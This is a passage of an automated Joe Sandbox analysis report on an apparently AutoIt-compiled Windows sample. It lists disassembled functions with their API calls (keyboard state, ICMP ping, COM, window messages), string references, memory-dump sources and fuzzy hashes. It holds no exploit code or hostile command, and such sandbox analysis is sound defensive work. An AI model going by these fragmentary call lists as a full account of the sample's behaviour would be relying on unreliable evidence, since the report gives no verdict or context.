API String ID: 2762341140-0
Opcode ID: a05690aa32f8b8dbb0f914f237056e653d5032e69c2231218a25aa49d83b14a1
Instruction ID: c92e3feec489f1e5f222c3962b2b8988d009fc9325af74d4683a1dea8a6294d7
Opcode Fuzzy Hash: a05690aa32f8b8dbb0f914f237056e653d5032e69c2231218a25aa49d83b14a1
Instruction Fuzzy Hash: BEC13C75A04119AFCB14DF64D8C8DAEBBF9FF48304B148599E8169B661DB30EE41CB90

Function 00C4541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C45504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C45515
CharNextW.USER32(00000158), ref: 00C45544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C45585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C4559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C455AC

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 26dbb3823f4e52620081c970327d05ed6ab9755d582723164529835fe5c5bb75
Instruction ID: 8f6a797200f4927a72f2719759dfac953877710b5bca44430d3e0c1c99efd8ea
Opcode Fuzzy Hash: 26dbb3823f4e52620081c970327d05ed6ab9755d582723164529835fe5c5bb75
Instruction Fuzzy Hash: 70619074905608EFDF109F65CC84AFE7BB9FF06720F108145F925AB2A2D7748A81DB60

Function 00C0FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C0FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 00C0FB08
VariantInit.OLEAUT32(?), ref: 00C0FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00C0FB3A
VariantCopy.OLEAUT32(?,?), ref: 00C0FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00C0FBA1
VariantClear.OLEAUT32(?), ref: 00C0FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 00C0FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C0FBCC
VariantClear.OLEAUT32(?), ref: 00C0FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C0FBE9

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 5c9b7210ef8144e9c722221f8ac8547f8b6d85e31d740678e9b3fa33e828a61d
Instruction ID: e3585c15335c6a1910f1d1c2e5462f81c989ffde8426d1243ea1027f0e1206f0
Opcode Fuzzy Hash: 5c9b7210ef8144e9c722221f8ac8547f8b6d85e31d740678e9b3fa33e828a61d
Instruction Fuzzy Hash: 49415235A00219DFCB10DF64C894ABDBBB9FF48354F008069E955A7261C734E986CFA0

Function 00C19C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C19CA1
GetAsyncKeyState.USER32(000000A0), ref: 00C19D22
GetKeyState.USER32(000000A0), ref: 00C19D3D
GetAsyncKeyState.USER32(000000A1), ref: 00C19D57
GetKeyState.USER32(000000A1), ref: 00C19D6C
GetAsyncKeyState.USER32(00000011), ref: 00C19D84
GetKeyState.USER32(00000011), ref: 00C19D96
GetAsyncKeyState.USER32(00000012), ref: 00C19DAE
GetKeyState.USER32(00000012), ref: 00C19DC0
GetAsyncKeyState.USER32(0000005B), ref: 00C19DD8
GetKeyState.USER32(0000005B), ref: 00C19DEA

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 91f8f289900ded9035eea4758fe2153fa3c50375c8e0c93c3b19e795b1d8e371
Instruction ID: 2fa4efbf0620ffda9437e1a7cba06470de9e1441a3cbcc9014a9a4f3a829c978
Opcode Fuzzy Hash: 91f8f289900ded9035eea4758fe2153fa3c50375c8e0c93c3b19e795b1d8e371
Instruction Fuzzy Hash: 0A41E5346047C969FF309664D8643E5BEB0EF13304F08805ADAD6566C2DBB49BC8E7A2

Function 00C3055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00C305BC
inet_addr.WSOCK32(?), ref: 00C3061C
gethostbyname.WSOCK32(?), ref: 00C30628
IcmpCreateFile.IPHLPAPI ref: 00C30636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C306C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C306E5
IcmpCloseHandle.IPHLPAPI(?), ref: 00C307B9
WSACleanup.WSOCK32 ref: 00C307BF

Strings

Ping, xrefs: 00C30676

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 2059e2cb84d49a277057d8c43244ce65a4b72eae2e4a296f003df2a51884dfdc
Instruction ID: c80dba68784eac38fb2751c648596315961bd0aae096480194a72fa1e0e2ac5f
Opcode Fuzzy Hash: 2059e2cb84d49a277057d8c43244ce65a4b72eae2e4a296f003df2a51884dfdc
Instruction Fuzzy Hash: D0918D366182019FD320DF15C899F2ABBE0BF45318F2485A9F46A9B6A2C770ED45CF91

Function 00C38CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00C38CF3

Part of subcall function 00C18E54: _wcslen.LIBCMT ref: 00C18E77

_wcslen.LIBCMT ref: 00C38D4E
_wcslen.LIBCMT ref: 00C38D9C
_wcslen.LIBCMT ref: 00C38DDC
_wcslen.LIBCMT ref: 00C38E6E

Strings

cdecl, xrefs: 00C38D48, 00C38D4D
stdcall, xrefs: 00C38DD6, 00C38DDB
winapi, xrefs: 00C38D96, 00C38D9B
none, xrefs: 00C38E65, 00C38E6A

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: f4075e9cb4bdacddb871bb512d0dcdd3ec722af06ac19528311674b6f4c0936c
Instruction ID: b48f0b72abca81498e4e0cee6bce29e03078afe0b7de100bcf3450108a5af8b4
Opcode Fuzzy Hash: f4075e9cb4bdacddb871bb512d0dcdd3ec722af06ac19528311674b6f4c0936c
Instruction Fuzzy Hash: 5651AF35A106169BCF14DF68C9909BEB7E5BF65720F204229F826E72C4EB34DE48C790

Function 00C3372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00C33774
CoUninitialize.OLE32 ref: 00C3377F
CoCreateInstance.OLE32(?,00000000,00000017,00C4FB78,?), ref: 00C337D9
IIDFromString.OLE32(?,?), ref: 00C3384C
VariantInit.OLEAUT32(?), ref: 00C338E4
VariantClear.OLEAUT32(?), ref: 00C33936

Strings

NULL Pointer assignment, xrefs: 00C3381E
Invalid parameter, xrefs: 00C33865
Failed to create object, xrefs: 00C337E4, 00C3389A

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: d71e761e50d474483caffae0e3bd4e802c64125120224372f383395f541621bb
Instruction ID: cd95b3ed7cfd03a0d618136ee50b93edf642f46e313be9c095b5b32aae8a6787
Opcode Fuzzy Hash: d71e761e50d474483caffae0e3bd4e802c64125120224372f383395f541621bb
Instruction Fuzzy Hash: 3161BF74618341AFD310DF54C889FAABBE8EF49710F10495EF9959B2A1C770EE48CB92

Function 00C23388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C233CF

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C233F0

Strings

^ ERROR , xrefs: 00C2349E
"%s" (%d) : ==> %s:%s%s, xrefs: 00C23504
Error: , xrefs: 00C234D1
Incorrect parameters to object property !, xrefs: 00C234AB
Line %d (File "%s"):, xrefs: 00C23443, 00C2345C
"%s" (%d) : ==> %s:, xrefs: 00C23522

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 07946d4fca7d96ed9e4e6a963e2ef4095f0057988bda7faf60111075f9389092
Instruction ID: 314a98f3583a995c591dda9bab6155b1a05acde39d79cd5877542f4297f416b8
Opcode Fuzzy Hash: 07946d4fca7d96ed9e4e6a963e2ef4095f0057988bda7faf60111075f9389092
Instruction Fuzzy Hash: C4516F31900219ABDB15EBA0DD46EFEB7F8EF04740F1441A5B50972061DB756F98DB60

Function 00C1B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C1B5FC
_wcslen.LIBCMT ref: 00C1B608
_wcslen.LIBCMT ref: 00C1B64D
_wcslen.LIBCMT ref: 00C1B68C
_wcslen.LIBCMT ref: 00C1B6C7

Strings

REMOVE, xrefs: 00C1B602, 00C1B607
KEYS, xrefs: 00C1B647, 00C1B64C
APPEND, xrefs: 00C1B6C1, 00C1B6C6
EXISTS, xrefs: 00C1B686, 00C1B68B

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: f073f4dbd27d5f2d762610be2911a4707d00ad570fcf33ba084e31de4b638ed3
Instruction ID: b61fd795acfc1ffd46c506ec4a561ebe325993b3dab8e0081d2a636fbfe41eda
Opcode Fuzzy Hash: f073f4dbd27d5f2d762610be2911a4707d00ad570fcf33ba084e31de4b638ed3
Instruction Fuzzy Hash: 7741D632A001269BCB145F7D88905FEB7A5AF72794B244169F435D7284F735CEC1DB90

Function 00C25393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C253A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C25416
GetLastError.KERNEL32 ref: 00C25420
SetErrorMode.KERNEL32(00000000,READY), ref: 00C254A7

Strings

INVALID, xrefs: 00C25459
READY, xrefs: 00C25460, 00C25468
READONLY, xrefs: 00C25452
NOTREADY, xrefs: 00C2544B
UNKNOWN, xrefs: 00C25444

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 4d06da961d65b6414c90cfe3ed7e1392316882f680a63e0505065193d07d3e2e
Instruction ID: 409a17e1fb92d06d816029032e1af2ddd615dc1edb75bed3995690f18cc791e5
Opcode Fuzzy Hash: 4d06da961d65b6414c90cfe3ed7e1392316882f680a63e0505065193d07d3e2e
Instruction Fuzzy Hash: 2431F075A006149FCB10EF68D884BEABBB4FF05305F148066E915CB6A2DB70DE82CB90

Function 00C43C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00C43C79
SetMenu.USER32(?,00000000), ref: 00C43C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C43D10
IsMenu.USER32(?), ref: 00C43D24
CreatePopupMenu.USER32 ref: 00C43D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C43D5B
DrawMenuBar.USER32 ref: 00C43D63

Strings

F, xrefs: 00C43D4E
0, xrefs: 00C43C54

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 40e74ca1be631e3d11052a784d63e46af551ef0b2487629a19b03286e4a1d0da
Instruction ID: 4cacafd5f344d7283464c4ac8955fae036bbb127cecca3d3f317ac7a6cfcb97d
Opcode Fuzzy Hash: 40e74ca1be631e3d11052a784d63e46af551ef0b2487629a19b03286e4a1d0da
Instruction Fuzzy Hash: EF415979A02209AFDB14CF64D888BAE7BB5FF89350F140029F956A7360D770AA10DF94

Function 00C11EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

Part of subcall function 00C13CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C13CCA

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00C11F64
GetDlgCtrlID.USER32 ref: 00C11F6F
GetParent.USER32 ref: 00C11F8B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C11F8E
GetDlgCtrlID.USER32(?), ref: 00C11F97
GetParent.USER32(?), ref: 00C11FAB
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C11FAE

Strings

ComboBox, xrefs: 00C11EEC
ListBox, xrefs: 00C11F21

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 678517c1b5f8dac45c36150c8c64f52c92408dd327e59baee579ce48c3f75d75
Instruction ID: 6f8ca264b8b8ebb45e129f3770b6c2df25f715dd9eaf89067c6ac290da7f6796
Opcode Fuzzy Hash: 678517c1b5f8dac45c36150c8c64f52c92408dd327e59baee579ce48c3f75d75
Instruction Fuzzy Hash: 4B21C274900214BBCF04EFA0CC85EFEBBB8EF06350F104155FA65672A1DB785949EB60

Function 00C43A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C43A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C43AA0
GetWindowLongW.USER32(?,000000F0), ref: 00C43AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C43AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C43B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00C43BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00C43BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00C43BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00C43BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00C43C13

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 156b2a161b5de10e38d648569bbab12c39f57437244c24262d1143c737352567
Instruction ID: 76bf812ebc9c4da051c46df52e71eb0e08bbbbc03ddc8932d7b9d69d527101aa
Opcode Fuzzy Hash: 156b2a161b5de10e38d648569bbab12c39f57437244c24262d1143c737352567
Instruction Fuzzy Hash: 1D616675A00248AFDB10DFA8CC81FEE77F8FB49710F144199FA15A72A1C770AA46DB50

Function 00C1B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C1B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C1A1E1,?,00000001), ref: 00C1B165
GetWindowThreadProcessId.USER32(00000000), ref: 00C1B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C1A1E1,?,00000001), ref: 00C1B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C1B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00C1A1E1,?,00000001), ref: 00C1B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C1A1E1,?,00000001), ref: 00C1B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C1A1E1,?,00000001), ref: 00C1B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00C1A1E1,?,00000001), ref: 00C1B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00C1A1E1,?,00000001), ref: 00C1B21D

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 5a16cd6cfd75da6988a48194e567e84ef98c1ab5998429bee73131cf5e0aca5c
Instruction ID: 5fae0942e819f8f69b0458a99dc0bbd8932c8c5978e3ea40b902d5bd8b291f7e
Opcode Fuzzy Hash: 5a16cd6cfd75da6988a48194e567e84ef98c1ab5998429bee73131cf5e0aca5c
Instruction Fuzzy Hash: A031DD75601204BFDB10AF64DC98FED7BA9BB63711F218004FA15DA1A0D7B89E849F68

Function 00BE2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BE2C94

Part of subcall function 00BE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BED7D1,00000000,00000000,00000000,00000000,?,00BED7F8,00000000,00000007,00000000,?,00BEDBF5,00000000), ref: 00BE29DE
Part of subcall function 00BE29C8: GetLastError.KERNEL32(00000000,?,00BED7D1,00000000,00000000,00000000,00000000,?,00BED7F8,00000000,00000007,00000000,?,00BEDBF5,00000000,00000000), ref: 00BE29F0

_free.LIBCMT ref: 00BE2CA0
_free.LIBCMT ref: 00BE2CAB
_free.LIBCMT ref: 00BE2CB6
_free.LIBCMT ref: 00BE2CC1
_free.LIBCMT ref: 00BE2CCC
_free.LIBCMT ref: 00BE2CD7
_free.LIBCMT ref: 00BE2CE2
_free.LIBCMT ref: 00BE2CED
_free.LIBCMT ref: 00BE2CFB

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fbd9e93e1eb44c2890cbd353b81c9ab0a163314c4b471441e012840ea08cea38
Instruction ID: 7f832721d1665246a310230547a32a041dc404610e9894536d33bc48754213ac
Opcode Fuzzy Hash: fbd9e93e1eb44c2890cbd353b81c9ab0a163314c4b471441e012840ea08cea38
Instruction Fuzzy Hash: 7911937A100148AFCB02EF56D882CDD3BA9FF05350F5254A5FA489B322DB39EA509B90

Function 00BB1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BB1459
OleUninitialize.OLE32(?,00000000), ref: 00BB14F8
UnregisterHotKey.USER32(?), ref: 00BB16DD
DestroyWindow.USER32(?), ref: 00BF24B9
FreeLibrary.KERNEL32(?), ref: 00BF251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BF254B

Strings

close all, xrefs: 00BB1454

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
